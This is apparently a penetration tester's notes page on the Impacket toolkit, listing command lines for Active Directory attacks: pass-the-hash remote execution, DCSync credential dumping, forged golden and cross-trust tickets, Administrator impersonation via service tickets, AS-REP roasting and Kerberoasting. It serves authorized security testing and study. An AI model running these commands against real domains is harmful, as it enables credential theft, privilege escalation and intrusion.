Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Pass the hash
  • Dcsync attack
  • Generate tickets
  • Golden trust cross ticket (child-parent domains in forest)
  • Service ticket
  • Overpass The Hash/Pass The Key (PTK)
  • AS-REP roasting
  • Kerberoasting
  1. Windows Pentesting
  2. Tools

Impacket

Impacket is a collection of Python classes for working with network protocols.

Pass the hash

We can use impacket to pass a (NT:LM) hash to authenticate.

impacket-psexec -hashes :nt incendium@corp.local 
impacket-atexec -hashes :nt incendium@corp.local whoami
impacket-smbexec -hashes :nt incendium@corp.local 
impacket-wmiexec -hashes :nt incendium@corp.local 

Dcsync attack

If you have a password:

impacket-secretsdump corp.local/incendium:Password123@10.10.110.55

With a cached ticket:

impacket-secretsdump -k -no-pass incendium@zph-svrdc01.zsm.local -target-ip 192.168.210.10 -dc-ip 192.168.210.10

Generate tickets

To generate the TGS with NTLM

impacket-ticketer -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

Golden trust cross ticket (child-parent domains in forest)

└─$ impacket-ticketer -nthash <krbtgt-hash> -domain-sid S-1-5-21-3056178012-3972705859-382195122 -domain internal.zsm.local -extra-sid S-1-5-21-2734290894-461713716-382195122-519 -spn krbtgt/parent.local incendium

Service ticket

Impacket’s getST.py will request a Service Ticket and save it as ccache.

With credentials:

impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123

With cached ticket:

impacket-getST -k -no-pass -spn cifs/DC-01.parent.local parent.local/incendium@parent.local -dc-ip 192.168.210.10

Overpass The Hash/Pass The Key (PTK)

// With NT hash
impacket-getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
// With credentials
impacket-getTGT.py <domain_name>/<user_name>:[password]

AS-REP roasting

impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting

impacket-GetUserSPNs -target-domain domain.local -usersfile users.txt -dc-ip dc01.domain.local domain.local/guest -
no-pass

PreviousBloodhoundNextBloodyAD

Last updated 5 months ago